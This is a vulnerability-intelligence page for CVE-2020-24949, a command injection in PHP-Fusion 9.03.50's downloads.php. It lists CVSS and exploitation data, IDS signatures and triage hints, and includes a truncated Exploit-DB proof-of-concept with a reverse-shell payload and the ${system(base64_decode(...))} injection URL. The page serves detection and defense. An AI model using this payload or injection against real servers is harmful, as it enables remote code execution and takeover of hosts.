CVE-2020-24949
Published 2020-09-03
Priority: P1 · 87 · high · 8.8 (CVSS 3.1)
CVSS vector: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Tags: ITW · Exploit · VulnCheck KEV · Initial access
Exploited in the wild
EPSS: 67.29% (99.2th percentile)
Privilege escalation in PHP-Fusion 9.03.50 downloads/downloads.php allows an authenticated user (not admin) to send a crafted request to the server and perform remote command execution (RCE).
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| php-fusion | php-fusion | — | — |
Detection & IOCs (extracted from sources)
Snort:
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET WEB_SPECIFIC_APPS PHP-Fusion Downloads.php Command Injection (CVE-2020-24949)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/infusions/"; content:"downloads.php?cat_id=|24 7b|system"; fast_pattern; reference:url,github.com/r90tpass/CVE-2020-24949/blob/main/exp.py; reference:cve,2020-24949; classtype:attempted-admin; sid:2033462; rev:1; metadata:created_at 2021_07_27, cve CVE_2020_24949, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_07_27, mitre_tactic_id TA0008, mitre_tactic_name Lateral_Movement, mitre_technique_id T1210, mitre_technique_name Exploitation_Of_Remote_Services;)
Bytes: |24 7b|system (the hex pair |24 7b| is the two-character sequence `${`, i.e. the start of the template injection in cat_id)
- Look for GET requests to /infusions/downloads/downloads.php where the cat_id parameter contains a ${ or ${{ template injection pattern invoking system(), base64_decode(), or other PHP functions.
- A successful exploitation response will contain the string 'infusion_db.php' in the HTTP response body; use this as a confirmation matcher.
- The exploit base64-encodes the reverse-shell payload to avoid '+' and '=' characters in the URL; look for base64_decode() calls inside the cat_id parameter as an evasion indicator.
- The exploit requires the PHP-Fusion 'Allow PHP Execution' feature to be enabled; verify this setting when triaging alerts.
- Exploitation requires the 'Allow PHP Execution' feature to be enabled in PHP-Fusion configuration; the vulnerability is not exploitable without this setting.
- The exploit payload must not contain '+' or '=' characters (e.g., from base64 padding) in the URL; attackers craft payloads specifically to avoid these characters.
CVSS provenance

| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 3.1 | 8.8 | HIGH | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| NVD | 2.0 | 9.0 | CRITICAL | AV:N/AC:L/Au:S/C:C/I:C/A:C |
| VulnCheck | | 8.8 | HIGH | |
GHSA
GHSA-vrxg-55c7-pjh6: Privilege escalation in PHP-Fusion 9
ghsa_unreviewed · 2022-05-24 · HIGH · CWE-269
VulnCheck
PHP-Fusion 9.03.50 downloads/downloads.php Authenticated Remote Code Execution
vulncheck · 2020 · CVSS 8.8 · HIGH
Affected: php-fusion php-fusion
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References:
- https://api.vulncheck.com/v3/index/sans-dshield?cve=CVE-2020-24949
- https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024
- https://www.f5.com/labs/articles/threat-intelligence/botpoke-scanner-switches-ip
- https://www.f5.com/labs/articles/threat-intelligence/continued-scan
Suricata
ET WEB_SPECIFIC_APPS PHP-Fusion Downloads.php Command Injection (CVE-2020-24949)
suricata · 2021-07-27 · CVSS 8.8 · HIGH
Rule: sid:2033462, identical to the ET rule listed under Detection & IOCs above.
Exploit-DB
PHPFusion 9.03.50 - Remote Code Execution
exploitdb · 2021-05-28 · CVSS 8.8 · HIGH
---
# Exploit Title: PHPFusion 9.03.50 - Remote Code Execution
# Date: 20/05/2021
# Exploit Author: g0ldm45k
# Vendor Homepage: https://www.php-fusion.co.uk/home.php
# Software Link: https://www.php-fusion.co.uk/infusions/downloads/downloads.php?cat_id=30&download_id=606
# Version: 9.03.50
# Tested on: Docker + Debian GNU/Linux 8 (jessie)
# CVE : CVE-2020-24949
# Found by: ThienNV
import requests
import base64
import argparse
PAYLOAD = "php -r '$sock=fsockopen(\"127.0.0.1\",4444);exec(\"/bin/sh -i &4 2>&4\");' " # !!spaces are important in order to avoid ==!!
REQUEST_PAYLOAD = "/infusions/downloads/downloads.php?cat_id=$\{{system(base64_decode({})).exit\}}"
parser = argparse.ArgumentParser(description='Send a payload to a Fusion 9.03.50 serv
Nuclei
PHP-Fusion 9.03.50 - Remote Code Execution
nuclei · CVSS 8.8 · HIGH
PHP-Fusion 9.03.50 downloads/downloads.php allows an authenticated user (not admin) to send a crafted request to the server and perform remote command execution.
Template:
id: CVE-2020-24949
info:
  name: PHP-Fusion 9.03.50 - Remote Code Execution
  author: geeknik
  severity: high
  description: PHP-Fusion 9.03.50 downloads/downloads.php allows an authenticated user (not admin) to send a crafted request to the server and perform remote command execution.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the affected system, potentially leading to full compromise.
  remediation: |
    Apply the latest security patch or upgrade to a non-vulnerable version of PHP-Fusion.
  reference:
    - https://packetstormsec
No writeups or analysis indexed.